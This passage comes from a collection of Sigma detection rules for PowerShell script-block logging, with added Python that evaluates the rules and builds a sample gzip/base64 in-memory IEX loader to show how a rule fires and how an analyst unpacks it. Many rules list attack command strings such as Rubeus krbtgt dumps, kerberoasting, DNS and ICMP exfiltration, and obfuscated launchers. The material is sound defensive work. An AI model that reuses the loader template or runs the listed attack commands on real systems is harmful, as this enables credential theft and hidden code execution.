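            raise ValueError(f"unsupported field spec: {field_spec}")
        needles = [values] if isinstance(values, str) else values
        hits = [n.lower() in text.lower() for n in needles]
        # `contains|all` needs every value; plain `contains` needs any one.
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


def evaluate_condition(condition: str, results: dict) -> bool:
    """Recursive-descent evaluator; `and` binds tighter than `or`, as in Sigma."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def term():
        tok = take()
        if tok == "not":
            return not term()
        if tok == "(":
            value = or_expr()
            take()  # closing parenthesis
            return value
        if peek() == "of":  # `all of x*` / `1 of x*`
            take()
            pattern = take()
            hits = [v for k, v in results.items() if fnmatch.fnmatchcase(k, pattern)]
            if not hits:
                raise ValueError(f"no selection matches {pattern}")
            return all(hits) if tok == "all" else sum(hits) >= int(tok)
        return results[tok]

    def and_expr():
        value = term()
        while peek() == "and":
            take()
            rhs = term()
            value = value and rhs
        return value

    def or_expr():
        value = and_expr()
        while peek() == "or":
            take()
            rhs = and_expr()
            value = value or rhs
        return value

    return or_expr()


def evaluate(rule: dict, text: str) -> bool:
    results = {name: selection_matches(text, sel)
               for name, sel in rule.items() if name != "condition"}
    return evaluate_condition(rule["condition"], results)


def scan(rules: dict, events: list) -> list:
    """Return (event index, rule title) for every event a rule fires on."""
    return [(i, title) for i, text in enumerate(events)
            for title, rule in rules.items() if evaluate(rule, text)]


if __name__ == "__main__":
    for idx, title in scan(RULES, SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```

Event 1 shows why the feature list matters (the cmdlet alone is not enough to fire), and event 3 shows the `filter_optional_module_export` exclusion doing its job on a module manifest that merely mentions `Export-PfxCertificate`. Real 4104 records are often split into several fragments, so a `contains|all` selection can miss when its strings land in different fragments; that is the main tuning caveat when porting these rules.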
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml",
    "content": "title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script\nid: df69cb1d-b891-4cd9-90c7-d617d90100ce\nrelated:\n    - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f\n      type: similar\nstatus: test\ndescription: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'FromBase64String'\n            - 'MemoryStream'\n            - 'H4sI'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
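The `H4sI` string in the rule above is not arbitrary: every gzip member starts with the bytes 1F 8B 08, and three bytes always base64-encode to the same four characters, so the blob carries that prefix whatever it compresses. The Python below is an added example, not code from the Sigma project: it builds a loader of the shape the rule targets around a constructed payload, checks the rule's three-string selection against it, and then recovers the embedded payload the way an analyst would when triaging a hit. The loader text, the payload and the function names are this example's own assumptions.

```python
"""Why the rule keys on 'H4sI', and how to unpack such a blob for triage.

Added example, not code from the Sigma project. The loader shape is a generic
reconstruction of the FromBase64String -> MemoryStream -> GzipStream pattern,
not a sample taken from any particular malware family.
"""
import base64
import gzip
import re
import zlib

# Every gzip member starts with these bytes (ID1, ID2, CM=deflate). Three bytes
# base64-encode to exactly four characters, so the prefix is content-independent.
GZIP_MAGIC = b"\x1f\x8b\x08"
GZIP_B64_PREFIX = base64.b64encode(GZIP_MAGIC).decode("ascii")  # "H4sI"

RULE_STRINGS = ("FromBase64String", "MemoryStream", "H4sI")


def wrap_like_loader(payload: bytes) -> str:
    """gzip then base64: the transformation the loader undoes at run time."""
    return base64.b64encode(gzip.compress(payload, mtime=0)).decode("ascii")


def build_loader(payload: bytes) -> str:
    """A typical in-memory loader shape (constructed for this example)."""
    blob = wrap_like_loader(payload)
    return (
        "$ms = New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + blob + "'));"
        "$gz = New-Object IO.Compression.GzipStream($ms,"
        "[IO.Compression.CompressionMode]::Decompress);"
        "IEX (New-Object IO.StreamReader($gz)).ReadToEnd()"
    )


def rule_matches(script_block: str) -> bool:
    """The rule's `contains|all` selection: all three strings, case-insensitive."""
    text = script_block.lower()
    return all(s.lower() in text for s in RULE_STRINGS)


def extract_gzip_payloads(script_block: str) -> list:
    """Recover every base64 gzip blob embedded in a script block.

    Candidate runs start with the gzip prefix. Anything that does not decode
    and decompress cleanly (a truncated run, or the literal text 'H4sI' in a
    comment) is skipped rather than raised, because 4104 events are often
    split across several records and a fragment may hold only part of a blob.
    """
    payloads = []
    for match in re.finditer(r"H4sI[A-Za-z0-9+/]*={0,2}", script_block):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            payloads.append(gzip.decompress(raw))
        except (ValueError, OSError, EOFError, zlib.error):
            continue
    return payloads


if __name__ == "__main__":
    sample = build_loader(b"Invoke-Mimikatz -DumpCreds")  # constructed payload
    print("rule fires:", rule_matches(sample))
    for p in extract_gzip_payloads(sample):
        print("recovered:", p.decode())
```

The same prefix trick generalises: base64 of a PE starts with `TVqQ` (MZ header) and base64 of a zip starts with `UEsD` (PK\x03\x04), which is why those strings turn up in sibling rules and in YARA signatures for encoded droppers.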
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml",
    "content": "title: Service Registry Permissions Weakness Check\nid: 95afc12e-3cbb-40c3-9340-84a032e596a3\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\n    Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.011\n    - stp.2a\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'get-acl'\n            - 'REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml",
    "content": "title: Active Directory Computers Enumeration With Get-AdComputer\nid: 36bed6b2-e9a0-4fff-beeb-413a92b86138\nstatus: test\ndescription: Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md\nauthor: frack113\ndate: 2022-03-17\nmodified: 2023-07-08\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Get-AdComputer '\n    selection_option:\n        ScriptBlockText|contains:\n            - '-Filter '\n            - '-LDAPFilter '\n            - '-Properties '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml",
    "content": "title: Active Directory Group Enumeration With Get-AdGroup\nid: 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee\nstatus: test\ndescription: Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: frack113\ndate: 2022-03-17\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1069.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-AdGroup '\n            - '-Filter'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml",
    "content": "title: Suspicious Get-ADReplAccount\nid: 060c3ef1-fd0a-4091-bf46-e7d625f60b73\nstatus: test\ndescription: |\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\n    These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://www.powershellgallery.com/packages/DSInternals\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount\nauthor: frack113\ndate: 2022-02-06\ntags:\n    - attack.credential-access\n    - attack.t1003.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Get-ADReplAccount\n            - '-All '\n            - '-Server '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml",
    "content": "title: Automated Collection Bookmarks Using Get-ChildItem PowerShell\nid: e0565f5d-d420-4e02-8a68-ac00d864f9cf\nstatus: test\ndescription: |\n    Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\n    Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\n    internal network resources such as servers, tools/dashboards, or other related infrastructure.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ChildItem'\n            - ' -Recurse '\n            - ' -Path '\n            - ' -Filter Bookmarks'\n            - ' -ErrorAction SilentlyContinue'\n            - ' -Force'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml",
    "content": "title: Security Software Discovery Via Powershell Script\nid: 904e8e61-8edf-4350-b59c-b905fc8e810c\nstatus: test\ndescription: |\n    Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\n    Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell\nauthor: frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-16\nmodified: 2023-10-24\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'get-process | \\?'\n            - 'get-process | where'\n            - 'gps | \\?'\n            - 'gps | where'\n    selection_field:\n        ScriptBlockText|contains:\n            - 'Company -like'\n            - 'Description -like'\n            - 'Name -like'\n            - 'Path -like'\n            - 'Product -like'\n    selection_keywords:\n        ScriptBlockText|contains:\n            # Note: These strings are using wildcard assuming the search is using the \"-like\" operator.\n            #       You can add specific variant with the actual process names to increase coverage\n            - '\\*avira\\*'\n            - '\\*carbonblack\\*'\n            - '\\*cylance\\*'\n            - '\\*defender\\*'\n            - '\\*kaspersky\\*'\n            - '\\*malware\\*'\n            - '\\*sentinel\\*'\n            - '\\*symantec\\*'\n            - '\\*virus\\*'\n    condition: all of 
selection_*\nfalsepositives:\n    - False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.\n    - As the \"selection_cmdlet\" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml",
    "content": "title: HackTool - Rubeus Execution - ScriptBlock\nid: 3245cd30-e015-40ff-a31d-5cadd5f377ec\nrelated:\n    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\n      type: similar\nstatus: test\ndescription: Detects the execution of the hacktool Rubeus using specific command line flags\nreferences:\n    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\n    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n    - https://github.com/GhostPack/Rubeus\nauthor: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-04-27\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'asreproast '\n            - 'dump /service:krbtgt '\n            - 'dump /luid:0x'\n            - 'kerberoast '\n            - 'createnetonly /program:'\n            - 'ptt /ticket:'\n            - '/impersonateuser:'\n            - 'renew /ticket:'\n            - 'asktgt /user:'\n            - 'harvest /interval:'\n            - 's4u /user:'\n            - 's4u /ticket:'\n            - 'hash /password:'\n            - 'golden /aes256:'\n            - 'silver /user:'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml",
    "content": "title: HackTool - WinPwn Execution - ScriptBlock\nid: 851fd622-b675-4d26-b803-14bc7baa517a\nrelated:\n    - id: d557dc06-62e8-4468-a8e8-7984124908ce\n      type: similar\nstatus: test\ndescription: |\n    Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-12-04\nreferences:\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\n    - https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\n    - https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md\n    - https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1046\n    - attack.t1082\n    - attack.t1106\n    - attack.t1518\n    - attack.t1548.002\n    - attack.t1552.001\n    - attack.t1555\n    - attack.t1555.003\nlogsource:\n    category: ps_script\n    product: windows\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Offline_Winpwn'\n            - 'WinPwn '\n            - 'WinPwn.exe'\n            - 'WinPwn.ps1'\n    condition: selection\nfalsepositives:\n    - As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml",
    "content": "title: PowerShell Hotfix Enumeration\nid: f5d1def8-1de0-4a0e-9794-1f6f27dd605c\nstatus: test\ndescription: Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers\nreferences:\n    - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-21\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Win32_QuickFixEngineering'\n            - 'HotFixID'\n    condition: selection\nfalsepositives:\n    - Legitimate administration scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml",
    "content": "title: PowerShell ICMP Exfiltration\nid: 4c4af3cd-2115-479c-8193-6b8bfce9001c\nstatus: test\ndescription: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp\nauthor: 'Bartlomiej Czyz @bczyz1, oscd.community'\ndate: 2020-10-10\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'System.Net.NetworkInformation.Ping'\n            - '.Send('\n    condition: selection\nfalsepositives:\n    - Legitimate usage of System.Net.NetworkInformation.Ping class\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml",
    "content": "title: Import PowerShell Modules From Suspicious Directories\nid: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab\nrelated:\n    - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3\n      type: similar\nstatus: test\ndescription: Detects powershell scripts that import modules from suspicious directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-07\nmodified: 2023-01-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Import-Module \"$Env:Temp\\'\n            - Import-Module '$Env:Temp\\\n            - 'Import-Module $Env:Temp\\'\n            - 'Import-Module \"$Env:Appdata\\'\n            - Import-Module '$Env:Appdata\\\n            - 'Import-Module $Env:Appdata\\'\n            - 'Import-Module C:\\Users\\Public\\'\n            # Import-Module alias is \"ipmo\"\n            - 'ipmo \"$Env:Temp\\'\n            - ipmo '$Env:Temp\\\n            - 'ipmo $Env:Temp\\'\n            - 'ipmo \"$Env:Appdata\\'\n            - ipmo '$Env:Appdata\\\n            - 'ipmo $Env:Appdata\\'\n            - 'ipmo C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml",
    "content": "title: Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript\nid: 975b2262-9a49-439d-92a6-0709cccdf0b2\nrelated:\n    - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\n      type: similar\n    - id: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-AppxPackage\" or its alias \"Add-AppPackage\" to install unsigned AppX packages\nreferences:\n    - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\n    - https://twitter.com/WindowsDocs/status/1620078135080325122\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'Add-AppPackage '\n            - 'Add-AppxPackage '\n    selection_flag:\n        ScriptBlockText|contains: ' -AllowUnsigned'\n    condition: all of selection_*\nfalsepositives:\n    - Installation of unsigned packages for testing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml",
    "content": "title: Execute Invoke-command on Remote Host\nid: 7b836d7f-179c-4ba4-90a7-a7e60afb48e6\nstatus: test\ndescription: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains|all:\n            - 'invoke-command '\n            - ' -ComputerName '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml",
    "content": "title: Powershell DNSExfiltration\nid: d59d7842-9a21-4bc6-ba98-64bfe0091355\nstatus: test\ndescription: DNSExfiltrator allows for transferring (exfiltrating) a file over a DNS request covert channel\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh\n    - https://github.com/Arno0x/DNSExfiltrator\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        - ScriptBlockText|contains: 'Invoke-DNSExfiltrator'\n        - ScriptBlockText|contains|all:\n              - ' -i '\n              - ' -d '\n              - ' -p '\n              - ' -doh '\n              - ' -t '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - PowerShell\nid: 73e67340-0d25-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell\nid: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_iex:\n        - ScriptBlockText|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ScriptBlockText|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ScriptBlockText|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ScriptBlockText|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ScriptBlockText|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ScriptBlockText|re: '\\$VerbosePreference\\.ToString\\('\n    condition: selection_iex\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - Powershell\nid: 779c8c12-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - PowerShell\nid: 0adfbc14-0ed1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell\nid: 20e5497e-331c-4cd5-8d36-935f6e2a9a07\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        ScriptBlockText|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        ScriptBlockText|endswith: 'readtoend'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell\nid: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml",
